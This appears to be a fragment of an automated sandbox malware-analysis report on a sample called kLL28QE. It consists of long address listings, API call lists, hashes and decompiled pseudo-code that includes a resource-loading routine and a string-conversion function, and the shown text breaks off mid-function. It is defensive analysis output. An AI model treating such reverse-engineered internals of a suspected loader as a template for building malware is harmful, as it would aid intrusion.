                                                                                                                                                                                                      0x00401e28
                                                                                                                                                                                                      0x00401e2d
                                                                                                                                                                                                      0x00401e32
                                                                                                                                                                                                      0x00401e37
                                                                                                                                                                                                      0x00401e3c
                                                                                                                                                                                                      0x00401e41
                                                                                                                                                                                                      0x00401e46
                                                                                                                                                                                                      0x00401e4b
                                                                                                                                                                                                      0x00401e50
                                                                                                                                                                                                      0x00401e55
                                                                                                                                                                                                      0x00401e5a
                                                                                                                                                                                                      0x00401e5f
                                                                                                                                                                                                      0x00401e64
                                                                                                                                                                                                      0x00401e69
                                                                                                                                                                                                      0x00401e6e
                                                                                                                                                                                                      0x00401e73
                                                                                                                                                                                                      0x00401e78
                                                                                                                                                                                                      0x00401e7d
                                                                                                                                                                                                      0x00401e82
                                                                                                                                                                                                      0x00401e86
                                                                                                                                                                                                      0x00401e8b
                                                                                                                                                                                                      0x00401e96
                                                                                                                                                                                                      0x00401e9a
                                                                                                                                                                                                      0x00401ea4
                                                                                                                                                                                                      0x00401eaf
                                                                                                                                                                                                      0x00401eba
                                                                                                                                                                                                      0x00401ebf
                                                                                                                                                                                                      0x00401ec4
                                                                                                                                                                                                      0x00401ec6
                                                                                                                                                                                                      0x00401ecb
                                                                                                                                                                                                      0x00401ece
                                                                                                                                                                                                      0x00401ed2
                                                                                                                                                                                                      0x00401ed4
                                                                                                                                                                                                      0x00401eef
                                                                                                                                                                                                      0x00401ed6
                                                                                                                                                                                                      0x00401edd
                                                                                                                                                                                                      0x00401ee2
                                                                                                                                                                                                      0x00401ee6
                                                                                                                                                                                                      0x00401ee9
                                                                                                                                                                                                      0x00401ee9
                                                                                                                                                                                                      0x00401ef7
                                                                                                                                                                                                      0x00401efc
                                                                                                                                                                                                      0x00401f02
                                                                                                                                                                                                      0x00401f08
                                                                                                                                                                                                      0x00401f0c
                                                                                                                                                                                                      0x00401f15
                                                                                                                                                                                                      0x00401f18
                                                                                                                                                                                                      0x00401f1a
                                                                                                                                                                                                      0x00401f1c
                                                                                                                                                                                                      0x00401f22
                                                                                                                                                                                                      0x00401f22
                                                                                                                                                                                                      0x00401f24
                                                                                                                                                                                                      0x00401f28
                                                                                                                                                                                                      0x00401f2f
                                                                                                                                                                                                      0x00401f33
                                                                                                                                                                                                      0x00401f33
                                                                                                                                                                                                      0x00401f40
                                                                                                                                                                                                      0x00401f45
                                                                                                                                                                                                      0x00401f4a
                                                                                                                                                                                                      0x00401f4b
                                                                                                                                                                                                      0x00401f50
                                                                                                                                                                                                      0x00401f58
                                                                                                                                                                                                      0x00401f58
                                                                                                                                                                                                      0x00401f58
                                                                                                                                                                                                      0x00401f58
                                                                                                                                                                                                      0x00401f33
                                                                                                                                                                                                      0x00401f63
                                                                                                                                                                                                      0x00401f63
                                                                                                                                                                                                      0x00401f69
                                                                                                                                                                                                      0x00401f72
                                                                                                                                                                                                      0x00401f72
                                                                                                                                                                                                      0x00401f72
                                                                                                                                                                                                      0x00401f73
                                                                                                                                                                                                      0x00401f75
                                                                                                                                                                                                      0x00401f7b
                                                                                                                                                                                                      0x00401f80
                                                                                                                                                                                                      0x00401f81
                                                                                                                                                                                                      0x00401f86
                                                                                                                                                                                                      0x00401f86
                                                                                                                                                                                                      0x00401f8c
                                                                                                                                                                                                      0x00401f8d
                                                                                                                                                                                                      0x00401f8d
                                                                                                                                                                                                      0x00401f9d
                                                                                                                                                                                                      0x00401fa2
                                                                                                                                                                                                      0x00401fa6
                                                                                                                                                                                                      0x00401fac
                                                                                                                                                                                                      0x00401faf
                                                                                                                                                                                                      0x00401fb6
                                                                                                                                                                                                      0x00401fbf
                                                                                                                                                                                                      0x00401fc4
                                                                                                                                                                                                      0x00401fc8
                                                                                                                                                                                                      0x00401fce
                                                                                                                                                                                                      0x00401fd3
                                                                                                                                                                                                      0x00401fe0
                                                                                                                                                                                                      0x00401fec
                                                                                                                                                                                                      0x00401ffe
                                                                                                                                                                                                      0x00402001
                                                                                                                                                                                                      0x00402006
                                                                                                                                                                                                      0x0040200b
                                                                                                                                                                                                      0x00402010
                                                                                                                                                                                                      0x00402015
                                                                                                                                                                                                      0x0040201a
                                                                                                                                                                                                      0x0040201f
                                                                                                                                                                                                      0x00402024
                                                                                                                                                                                                      0x00402029
                                                                                                                                                                                                      0x0040202e
                                                                                                                                                                                                      0x00402033
                                                                                                                                                                                                      0x00402038
                                                                                                                                                                                                      0x0040203d
                                                                                                                                                                                                      0x00402042
                                                                                                                                                                                                      0x00402047
                                                                                                                                                                                                      0x0040204c
                                                                                                                                                                                                      0x00402051
                                                                                                                                                                                                      0x00402056
                                                                                                                                                                                                      0x0040205b
                                                                                                                                                                                                      0x00402060
                                                                                                                                                                                                      0x00402065
                                                                                                                                                                                                      0x0040206a
                                                                                                                                                                                                      0x0040206f
                                                                                                                                                                                                      0x00402074
                                                                                                                                                                                                      0x00402079
                                                                                                                                                                                                      0x0040207e
                                                                                                                                                                                                      0x00402083
                                                                                                                                                                                                      0x00402088
                                                                                                                                                                                                      0x0040208d
                                                                                                                                                                                                      0x00402092
                                                                                                                                                                                                      0x00402097
                                                                                                                                                                                                      0x0040209c
                                                                                                                                                                                                      0x004020a1
                                                                                                                                                                                                      0x004020a5
                                                                                                                                                                                                      0x004020aa
                                                                                                                                                                                                      0x004020ae
                                                                                                                                                                                                      0x004020b4
                                                                                                                                                                                                      0x004020b6
                                                                                                                                                                                                      0x004020bb
                                                                                                                                                                                                      0x004020c0
                                                                                                                                                                                                      0x004020c5
                                                                                                                                                                                                      0x004020ca
                                                                                                                                                                                                      0x004020cf
                                                                                                                                                                                                      0x004020d4
                                                                                                                                                                                                      0x004020e1
                                                                                                                                                                                                      0x004020e6
                                                                                                                                                                                                      0x004020eb
                                                                                                                                                                                                      0x004020f0
                                                                                                                                                                                                      0x004020f5
                                                                                                                                                                                                      0x004020fa
                                                                                                                                                                                                      0x004020ff
                                                                                                                                                                                                      0x00402104
                                                                                                                                                                                                      0x00402109
                                                                                                                                                                                                      0x0040210e
                                                                                                                                                                                                      0x00402113
                                                                                                                                                                                                      0x00402118
                                                                                                                                                                                                      0x0040211d
                                                                                                                                                                                                      0x00402122
                                                                                                                                                                                                      0x00402127
                                                                                                                                                                                                      0x0040212c
                                                                                                                                                                                                      0x00402131
                                                                                                                                                                                                      0x00402136
                                                                                                                                                                                                      0x0040213b
                                                                                                                                                                                                      0x00402140
                                                                                                                                                                                                      0x00402145
                                                                                                                                                                                                      0x0040214a
                                                                                                                                                                                                      0x0040214f
                                                                                                                                                                                                      0x00402154
                                                                                                                                                                                                      0x00402159
                                                                                                                                                                                                      0x0040215e
                                                                                                                                                                                                      0x00402163
                                                                                                                                                                                                      0x00402167
                                                                                                                                                                                                      0x0040216c
                                                                                                                                                                                                      0x00402171
                                                                                                                                                                                                      0x00402177
                                                                                                                                                                                                      0x00402179
                                                                                                                                                                                                      0x0040217c
                                                                                                                                                                                                      0x0040217e
                                                                                                                                                                                                      0x00402183
                                                                                                                                                                                                      0x00402188
                                                                                                                                                                                                      0x0040218f
                                                                                                                                                                                                      0x00402196
                                                                                                                                                                                                      0x0040219a
                                                                                                                                                                                                      0x0040219e
                                                                                                                                                                                                      0x004021a2
                                                                                                                                                                                                      0x004021a4
                                                                                                                                                                                                      0x004021bc
                                                                                                                                                                                                      0x004021be
                                                                                                                                                                                                      0x004021c0
                                                                                                                                                                                                      0x004021c6
                                                                                                                                                                                                      0x004021ca
                                                                                                                                                                                                      0x004021e5
                                                                                                                                                                                                      0x004021ec
                                                                                                                                                                                                      0x004021f1
                                                                                                                                                                                                      0x00402213
                                                                                                                                                                                                      0x00402215
                                                                                                                                                                                                      0x00402217
                                                                                                                                                                                                      0x0040221d
                                                                                                                                                                                                      0x00402239
                                                                                                                                                                                                      0x0040223b
                                                                                                                                                                                                      0x0040223d
                                                                                                                                                                                                      0x00402243
                                                                                                                                                                                                      0x0040224d
                                                                                                                                                                                                      0x0040224f
                                                                                                                                                                                                      0x00402251
                                                                                                                                                                                                      0x00402260
                                                                                                                                                                                                      0x00402264
                                                                                                                                                                                                      0x00402269
                                                                                                                                                                                                      0x00402277
                                                                                                                                                                                                      0x0040227b
                                                                                                                                                                                                      0x00402286
                                                                                                                                                                                                      0x00402293
                                                                                                                                                                                                      0x004022af
                                                                                                                                                                                                      0x004022b1
                                                                                                                                                                                                      0x004022b5
                                                                                                                                                                                                      0x004022b7
                                                                                                                                                                                                      0x004022be
                                                                                                                                                                                                      0x004022be
                                                                                                                                                                                                      0x004022d7
                                                                                                                                                                                                      0x004022e8
                                                                                                                                                                                                      0x004022ef
                                                                                                                                                                                                      0x004022f6
                                                                                                                                                                                                      0x00402300
                                                                                                                                                                                                      0x00402304
                                                                                                                                                                                                      0x00402308
                                                                                                                                                                                                      0x00402315
                                                                                                                                                                                                      0x0040231a
                                                                                                                                                                                                      0x0040231e
                                                                                                                                                                                                      0x00402324
                                                                                                                                                                                                      0x00402328
                                                                                                                                                                                                      0x0040232a
                                                                                                                                                                                                      0x00402331
                                                                                                                                                                                                      0x00402331
                                                                                                                                                                                                      0x0040234e
                                                                                                                                                                                                      0x00402350
                                                                                                                                                                                                      0x00402352
                                                                                                                                                                                                      0x00402355
                                                                                                                                                                                                      0x00402355
                                                                                                                                                                                                      0x0040235b
                                                                                                                                                                                                      0x0040235f
                                                                                                                                                                                                      0x00402361
                                                                                                                                                                                                      0x00402368
                                                                                                                                                                                                      0x00402368
                                                                                                                                                                                                      0x0040236d
                                                                                                                                                                                                      0x00402371
                                                                                                                                                                                                      0x00402373
                                                                                                                                                                                                      0x00402375
                                                                                                                                                                                                      0x0040237b
                                                                                                                                                                                                      0x0040237b
                                                                                                                                                                                                      0x00402377
                                                                                                                                                                                                      0x00402377
                                                                                                                                                                                                      0x00402377
                                                                                                                                                                                                      0x00402390
                                                                                                                                                                                                      0x00402396
                                                                                                                                                                                                      0x0040239c
                                                                                                                                                                                                      0x004023a0
                                                                                                                                                                                                      0x004023a2
                                                                                                                                                                                                      0x004023a9
                                                                                                                                                                                                      0x004023a9
                                                                                                                                                                                                      0x004023ae
                                                                                                                                                                                                      0x004023b2
                                                                                                                                                                                                      0x004023b4
                                                                                                                                                                                                      0x004023ba
                                                                                                                                                                                                      0x004023ba
                                                                                                                                                                                                      0x004023b6
                                                                                                                                                                                                      0x004023b6
                                                                                                                                                                                                      0x004023b6
                                                                                                                                                                                                      0x004023ce
                                                                                                                                                                                                      0x004023d1
                                                                                                                                                                                                      0x004023d3
                                                                                                                                                                                                      0x004023dd
                                                                                                                                                                                                      0x004023ec
                                                                                                                                                                                                      0x004023ef
                                                                                                                                                                                                      0x004023fe
                                                                                                                                                                                                      0x00402401
                                                                                                                                                                                                      0x00402403
                                                                                                                                                                                                      0x00402411
                                                                                                                                                                                                      0x00402417
                                                                                                                                                                                                      0x00402424
                                                                                                                                                                                                      0x00402426
                                                                                                                                                                                                      0x0040242a
                                                                                                                                                                                                      0x0040242c
                                                                                                                                                                                                      0x00402434
                                                                                                                                                                                                      0x00402434
                                                                                                                                                                                                      0x0040243a
                                                                                                                                                                                                      0x0040243f
                                                                                                                                                                                                      0x00402443
                                                                                                                                                                                                      0x00402445
                                                                                                                                                                                                      0x0040244d
                                                                                                                                                                                                      0x0040244d
                                                                                                                                                                                                      0x00402445
                                                                                                                                                                                                      0x00402251
                                                                                                                                                                                                      0x0040223d
                                                                                                                                                                                                      0x0040244f
                                                                                                                                                                                                      0x0040245d
                                                                                                                                                                                                      0x0040245f
                                                                                                                                                                                                      0x00402461
                                                                                                                                                                                                      0x00402462
                                                                                                                                                                                                      0x00402467
                                                                                                                                                                                                      0x00402467
                                                                                                                                                                                                      0x0040245f
                                                                                                                                                                                                      0x004021ca
                                                                                                                                                                                                      0x0040246a
                                                                                                                                                                                                      0x0040246e
                                                                                                                                                                                                      0x00402470
                                                                                                                                                                                                      0x00402478
                                                                                                                                                                                                      0x00402478
                                                                                                                                                                                                      0x0040247a
                                                                                                                                                                                                      0x0040247e
                                                                                                                                                                                                      0x00402480
                                                                                                                                                                                                      0x00402488
                                                                                                                                                                                                      0x00402488
                                                                                                                                                                                                      0x00402480
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401c55
                                                                                                                                                                                                      0x00401c62
                                                                                                                                                                                                      0x00401c67
                                                                                                                                                                                                      0x00401c6a
                                                                                                                                                                                                      0x00401c6c
                                                                                                                                                                                                      0x00401c73
                                                                                                                                                                                                      0x00401c73
                                                                                                                                                                                                      0x00401c77
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401c7b
                                                                                                                                                                                                      0x00401c8f
                                                                                                                                                                                                      0x00401c8f
                                                                                                                                                                                                      0x00401c7d
                                                                                                                                                                                                      0x00401c7d
                                                                                                                                                                                                      0x00401c83
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401c85
                                                                                                                                                                                                      0x00401c85
                                                                                                                                                                                                      0x00401c88
                                                                                                                                                                                                      0x00401c8d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401c8d
                                                                                                                                                                                                      0x00401c83
                                                                                                                                                                                                      0x00401c98
                                                                                                                                                                                                      0x00401c9a
                                                                                                                                                                                                      0x00401cbd
                                                                                                                                                                                                      0x00401cc2
                                                                                                                                                                                                      0x00401cc5
                                                                                                                                                                                                      0x00401cc7
                                                                                                                                                                                                      0x00401cd0
                                                                                                                                                                                                      0x00401cd0
                                                                                                                                                                                                      0x00401cd2
                                                                                                                                                                                                      0x00401cd4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401cd6
                                                                                                                                                                                                      0x00401cd8
                                                                                                                                                                                                      0x00401cec
                                                                                                                                                                                                      0x00401cec
                                                                                                                                                                                                      0x00401cda
                                                                                                                                                                                                      0x00401cda
                                                                                                                                                                                                      0x00401cdd
                                                                                                                                                                                                      0x00401ce0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401ce2
                                                                                                                                                                                                      0x00401ce2
                                                                                                                                                                                                      0x00401ce5
                                                                                                                                                                                                      0x00401ce8
                                                                                                                                                                                                      0x00401cea
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401cea
                                                                                                                                                                                                      0x00401ce0
                                                                                                                                                                                                      0x00401cf5
                                                                                                                                                                                                      0x00401cf5
                                                                                                                                                                                                      0x00401cf7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401cf9
                                                                                                                                                                                                      0x00401d02
                                                                                                                                                                                                      0x00401d07
                                                                                                                                                                                                      0x00401d09
                                                                                                                                                                                                      0x00401d10
                                                                                                                                                                                                      0x00401d1d
                                                                                                                                                                                                      0x00401d22
                                                                                                                                                                                                      0x00401d25
                                                                                                                                                                                                      0x00401d27
                                                                                                                                                                                                      0x00401d30
                                                                                                                                                                                                      0x00401d30
                                                                                                                                                                                                      0x00401d32
                                                                                                                                                                                                      0x00401d34
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401d36
                                                                                                                                                                                                      0x00401d38
                                                                                                                                                                                                      0x00401d4c
                                                                                                                                                                                                      0x00401d4c
                                                                                                                                                                                                      0x00401d3a
                                                                                                                                                                                                      0x00401d3a
                                                                                                                                                                                                      0x00401d3d
                                                                                                                                                                                                      0x00401d40
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401d42
                                                                                                                                                                                                      0x00401d42
                                                                                                                                                                                                      0x00401d45
                                                                                                                                                                                                      0x00401d48
                                                                                                                                                                                                      0x00401d4a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401d4a
                                                                                                                                                                                                      0x00401d40
                                                                                                                                                                                                      0x00401d55
                                                                                                                                                                                                      0x00401d55
                                                                                                                                                                                                      0x00401d57
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401d5d
                                                                                                                                                                                                      0x00401d6a
                                                                                                                                                                                                      0x00401d6f
                                                                                                                                                                                                      0x00401d72
                                                                                                                                                                                                      0x00401d74
                                                                                                                                                                                                      0x00401d80
                                                                                                                                                                                                      0x00401d80
                                                                                                                                                                                                      0x00401d82
                                                                                                                                                                                                      0x00401d84
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401d86
                                                                                                                                                                                                      0x00401d88
                                                                                                                                                                                                      0x00401d9c
                                                                                                                                                                                                      0x00401d9c
                                                                                                                                                                                                      0x00401d8a
                                                                                                                                                                                                      0x00401d8a
                                                                                                                                                                                                      0x00401d8d
                                                                                                                                                                                                      0x00401d90
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401d92
                                                                                                                                                                                                      0x00401d92
                                                                                                                                                                                                      0x00401d95
                                                                                                                                                                                                      0x00401d98
                                                                                                                                                                                                      0x00401d9a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401d9a
                                                                                                                                                                                                      0x00401d90
                                                                                                                                                                                                      0x00401da5
                                                                                                                                                                                                      0x00401da5
                                                                                                                                                                                                      0x00401da7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401da7
                                                                                                                                                                                                      0x00401da0
                                                                                                                                                                                                      0x00401da2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401da2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401d57
                                                                                                                                                                                                      0x00401d50
                                                                                                                                                                                                      0x00401d52
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401dad
                                                                                                                                                                                                      0x00401db6
                                                                                                                                                                                                      0x00401dbb
                                                                                                                                                                                                      0x00401dbb
                                                                                                                                                                                                      0x00401d10
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401d09
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401cf7
                                                                                                                                                                                                      0x00401cf0
                                                                                                                                                                                                      0x00401cf2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401c9c
                                                                                                                                                                                                      0x00401c9c
                                                                                                                                                                                                      0x00401c9d
                                                                                                                                                                                                      0x00401caf
                                                                                                                                                                                                      0x00401caf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401c9a
                                                                                                                                                                                                      0x00401c93
                                                                                                                                                                                                      0x00401c95
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401c95
                                                                                                                                                                                                      0x00401c4f
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                                                                      • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                                                                                      • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                                                                                                                                                      • Module32Next.KERNEL32 ref: 00401D02
                                                                                                                                                                                                      • Module32Next.KERNEL32 ref: 00401DB6
                                                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                                                      • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                                                      • API String ID: 2366190142-2962942730
                                                                                                                                                                                                      • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                                                      • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 156 4018f0-4018fa 157 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 156->157 158 4018fc-401900 156->158 161 401940-401949 GetLastError 157->161 162 401996-40199a 157->162 163 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 161->163 164 40198d-40198f 161->164 163->164 164->162 166 401991 call 401030 164->166 166->162
                                                                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                                                                      			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				signed int _t12;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				int _t25;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      				int _t32;
                                                                                                                                                                                                      				char* _t35;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t21 = __edx;
                                                                                                                                                                                                      				_t35 = _a4;
                                                                                                                                                                                                      				_t17 = __ecx;
                                                                                                                                                                                                      				if(_t35 != 0) {
                                                                                                                                                                                                      					_t25 = lstrlenA(_t35) + 1;
                                                                                                                                                                                                      					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                                                                                                                                                                      					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
                                                                                                                                                                                                      					asm("sbb esi, esi");
                                                                                                                                                                                                      					_t30 =  ~_t12 + 1;
                                                                                                                                                                                                      					if(_t30 != 0) {
                                                                                                                                                                                                      						_t12 = GetLastError();
                                                                                                                                                                                                      						if(_t12 == 0x7a) {
                                                                                                                                                                                                      							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                                                                                                                                                                      							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                                                                                                                                                                      							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                                                                                                                                                                      							asm("sbb esi, esi");
                                                                                                                                                                                                      							_t30 =  ~_t12 + 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if(_t30 != 0) {
                                                                                                                                                                                                      							_t12 = E00401030();
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return _t12;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					 *__ecx = _t35;
                                                                                                                                                                                                      					return __eax;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x004018f0
                                                                                                                                                                                                      0x004018f2
                                                                                                                                                                                                      0x004018f6
                                                                                                                                                                                                      0x004018fa
                                                                                                                                                                                                      0x00401917
                                                                                                                                                                                                      0x0040191a
                                                                                                                                                                                                      0x0040192f
                                                                                                                                                                                                      0x00401939
                                                                                                                                                                                                      0x0040193b
                                                                                                                                                                                                      0x0040193e
                                                                                                                                                                                                      0x00401940
                                                                                                                                                                                                      0x00401949
                                                                                                                                                                                                      0x0040195e
                                                                                                                                                                                                      0x0040196b
                                                                                                                                                                                                      0x00401980
                                                                                                                                                                                                      0x0040198a
                                                                                                                                                                                                      0x0040198c
                                                                                                                                                                                                      0x0040198c
                                                                                                                                                                                                      0x0040198f
                                                                                                                                                                                                      0x00401991
                                                                                                                                                                                                      0x00401991
                                                                                                                                                                                                      0x0040198f
                                                                                                                                                                                                      0x0040199a
                                                                                                                                                                                                      0x004018fc
                                                                                                                                                                                                      0x004018fc
                                                                                                                                                                                                      0x00401900
                                                                                                                                                                                                      0x00401900

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3322701435-0
                                                                                                                                                                                                      • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                      • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 169 40af66-40af6e 170 40af7d-40af88 call 40b84d 169->170 173 40af70-40af7b call 40d2e3 170->173 174 40af8a-40af8b 170->174 173->170 177 40af8c-40af98 173->177 178 40afb3-40afca call 40af49 call 40cd39 177->178 179 40af9a-40afb2 call 40aefc call 40d2bd 177->179 179->178
                                                                                                                                                                                                      C-Code - Quality: 63%
                                                                                                                                                                                                      			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                      				signed int _v4;
                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				intOrPtr* _t21;
                                                                                                                                                                                                      				signed int _t24;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                      				void* _t40;
                                                                                                                                                                                                      				signed int _t42;
                                                                                                                                                                                                      				void* _t45;
                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                      				void* _t51;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t40 = __edi;
                                                                                                                                                                                                      				_t28 = __ebx;
                                                                                                                                                                                                      				_t45 = _t51;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
